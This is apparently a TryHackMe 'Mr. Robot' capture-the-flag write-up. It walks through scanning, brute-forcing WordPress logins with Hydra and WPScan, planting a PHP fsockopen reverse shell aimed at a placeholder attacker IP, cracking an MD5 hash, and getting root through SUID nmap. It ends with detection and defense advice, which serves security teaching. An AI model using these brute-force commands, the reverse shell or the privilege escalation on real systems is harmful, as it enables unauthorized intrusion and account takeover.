Mr. Robot CTF — TryHackMe Writeup (Linux, Medium)

Attack Chain Overview

Nmap → ports 80/443 (Apache + WordPress)
        ↓
robots.txt → Key 1 + fsocity.dic wordlist
        ↓
Hydra + WPScan → brute force WordPress credentials (elliot)
        ↓
WordPress Theme Editor → PHP reverse shell in archive.php
        ↓
Shell as daemon → /home/robot/password.raw-md5
        ↓
Crack MD5 → su robot → Key 2
        ↓
SUID nmap --interactive → !sh → root
        ↓
Key 3 in /root/

Phase 1 — Reconnaissance

Nmap Scan

nmap -sV -sC --min-rate 100 10.10.66.127

PORT    STATE   SERVICE  VERSION
22/tcp  closed  ssh
80/tcp  open    http     Apache httpd
443/tcp open    ssl/http Apache httpd

Key observations:

• SSH is closed — no direct SSH access
• Port 80 and 443 both run Apache — same web app on HTTP and HTTPS
• The SSL cert says www.example.com — CTF machine, not a real domain

Web Directory Enumeration

dirb http://10.10.66.127
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.66.127

Notable paths discovered: /wp-login, /wp-admin, /dashboard, /robots.txt. The presence of /wp-login immediately identifies this as a WordPress installation.

robots.txt — Key 1 + Wordlist

Navigating to http://10.10.66.127/robots.txt:

User-agent: *
fsocity.dic
key-1-of-3.txt

Why check robots.txt? It's a file that tells web crawlers which paths to avoid indexing. Developers sometimes accidentally list sensitive paths here. In this case, it exposed both the first flag and a custom wordlist fsocity.dic — a dictionary file themed around the Mr Robot show.

# Download the wordlist
wget http://10.10.66.127/fsocity.dic

# Check its size — likely has duplicates
wc -l fsocity.dic

🏁 Key 1 found at http://10.10.66.127/key-1-of-3.txt

Phase 2 — WordPress Credential Brute Force

Username Enumeration with Hydra

WordPress leaks whether a username is valid through different error messages:

• Wrong username → Invalid username
• Right username, wrong password → The password you entered for the username...

This makes username enumeration trivial with Hydra:

hydra -L fsocity.dic -p test123 10.10.66.127 \
  http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username" -V

Result: Username is Elliot (a character from the Mr Robot show).

Why this works: The -L flag feeds the wordlist as usernames while -p keeps the password fixed at a dummy value. We're not trying to find the password here — just confirm which username triggers the different error message.

Password Brute Force

The fsocity.dic file has many duplicates which would slow down the brute force. Sort and deduplicate first:

sort -f fsocity.dic | uniq -i > sort.txt
wc -l sort.txt   # much smaller now

Why deduplication matters: If fsocity.dic has 858,000 lines but only 11,000 unique entries, brute forcing with the original file wastes 98% of requests. Always deduplicate wordlists before brute forcing.

Now use WPScan — purpose-built for WordPress and handles rate limiting and WordPress-specific auth better than Hydra:

wpscan --url http://10.10.66.127 -t 50 -U elliot -P sort.txt

Credentials found:

Username: elliot
Password: ER28-0652

Phase 3 — Initial Access via WordPress Theme Editor

Login to WordPress Dashboard

Navigate to http://10.10.66.127/wp-login and log in as elliot.

Inject Reverse Shell via Theme Editor

Navigate to: Appearance → Editor → archive.php

Why archive.php? WordPress theme PHP files are served directly by the web server. If you can edit a theme file and inject PHP code, triggering that file via the browser executes your code as the web server user (daemon). archive.php is a good target because it's rarely used and easy to trigger by visiting a non-existent archive URL.

Replace the entire contents of archive.php with a PHP reverse shell (generate one from revshells.com using the PHP fsockopen method):

<?php
set_time_limit(0);
$ip = 'YOUR_IP';
$port = 4444;
$sock = fsockopen($ip, $port);
$proc = proc_open('sh', array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
?>

Save the file, start a listener, then trigger it:

# Listener on Kali
nc -lvnp 4444

# Trigger archive.php in browser or curl
curl http://10.10.66.127/?cat=1   # any archive URL triggers archive.php

Shell received as daemon.

Upgrade the Shell

python -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z
stty raw -echo; fg
export TERM=xterm

Phase 4 — Lateral Movement to robot (Key 2)

Enumerate /home/robot

daemon@linux:/home$ ls
robot
daemon@linux:/home$ cd robot && ls -la

-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5

key-2-of-3.txt is only readable by robot — but password.raw-md5 is world-readable. This is the path to lateral movement.

daemon@linux:/home/robot$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

Crack the MD5 Hash

Why MD5 is weak: MD5 produces a 128-bit hash and has no salt — meaning the same password always produces the same hash. Rainbow tables and online lookup databases like CrackStation have pre-computed hashes for billions of common passwords. This hash cracks instantly.

Submit to crackstation.net:

Hash: c3fcd3d76192e4007dfb496cca67e13b

Cracked: abcdefghijklmnopqrstuvwxyz

Switch to robot and Get Key 2

daemon@linux:/home$ su robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:~$ cat key-2-of-3.txt

🏁 Key 2 captured.

Phase 5 — Privilege Escalation to Root via SUID Nmap (Key 3)

Check sudo and SUID Binaries

sudo -l   # prompts for password — robot can't use sudo

find / -perm -4000 -type f 2>/dev/null

/bin/ping
/bin/su
/usr/bin/passwd
/usr/bin/sudo
/usr/local/bin/nmap       ← NOT a default SUID binary ★
/usr/lib/openssh/ssh-keysign

Why SUID matters: The SUID (Set User ID) bit means the binary runs as its owner (often root) regardless of who executes it. If a SUID binary can be abused to spawn a shell or execute arbitrary commands, you get those commands running as root.

Why nmap SUID is suspicious: nmap has no legitimate reason to be SUID root. It's a non-default configuration — and it's a well-known GTFOBins entry.

Check Nmap Version

nmap --version

nmap version 3.81

Why the version matters: Nmap 3.81 is ancient (2005). Old versions of nmap had an --interactive mode that allowed running shell commands from within the nmap prompt. This feature was removed in newer versions precisely because it was a security risk. With SUID set, this becomes an instant root escalation.

Exploit via Interactive Mode

robot@linux:~$ nmap --interactive

Starting nmap V. 3.81
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# whoami
root

Why !sh works: The ! prefix in nmap's interactive mode passes the command to /bin/sh. Since nmap is running as root (SUID), the shell spawned by !sh inherits root privileges.

Reference: GTFOBins — nmap

Get Key 3

# cd /root
# ls
key-3-of-3.txt
# cat key-3-of-3.txt

🏁 Key 3 captured. All three flags collected.

Key Commands Reference

# Recon
nmap -sV -sC --min-rate 100 10.10.66.127
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.66.127

# Key 1
curl http://10.10.66.127/robots.txt
wget http://10.10.66.127/fsocity.dic
curl http://10.10.66.127/key-1-of-3.txt

# Wordlist cleanup
sort -f fsocity.dic | uniq -i > sort.txt

# Username brute force
hydra -L fsocity.dic -p test123 10.10.66.127 \
  http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username" -V

# Password brute force
wpscan --url http://10.10.66.127 -t 50 -U elliot -P sort.txt

# Listener
nc -lvnp 4444

# Shell upgrade
python -c 'import pty; pty.spawn("/bin/bash")'

# Switch to robot
su robot   # password: abcdefghijklmnopqrstuvwxyz

# SUID enumeration
find / -perm -4000 -type f 2>/dev/null

# Nmap SUID escalation
nmap --interactive
# then: !sh

Lessons Learned

What Worked Well

• Checking robots.txt immediately paid off — it gave the first flag and the custom wordlist in one step. Always check /robots.txt early.
• Deduplicating the wordlist before brute forcing saved significant time — the original file had huge numbers of duplicates.
• SUID binary enumeration with find / -perm -4000 is a quick, reliable privesc check that should always be run after gaining a shell.

What to Do Faster Next Time

• Recognize WordPress faster from the directory scan — /wp-login, /wp-admin, and /wp-content are unmistakable. Jump straight to WPScan rather than spending time with generic dirb scans.
• When you see a .raw-md5 file, crack it immediately rather than trying other lateral movement methods first.

Detection & Defense

How to detect this attack:

• Alert on multiple failed WordPress login attempts from a single IP (brute force pattern)
• Monitor WordPress theme file modifications — editing theme PHP files outside of a deployment pipeline is highly suspicious
• Log all SUID binary executions, especially non-standard ones like /usr/local/bin/nmap

How to prevent it:

• Enable WordPress login rate limiting or use a plugin like Wordfence to block brute force
• Disable the WordPress Theme/Plugin Editor in wp-config.php: define('DISALLOW_FILE_EDIT', true);
• Never store passwords as unsalted MD5 — use bcrypt, Argon2, or at minimum salted SHA-256
• Audit SUID binaries regularly — nmap has no legitimate reason to have the SUID bit set. Remove it: chmod u-s /usr/local/bin/nmap
• Keep software updated — nmap 3.81's interactive mode was a known risk even in 2005

Technique Summary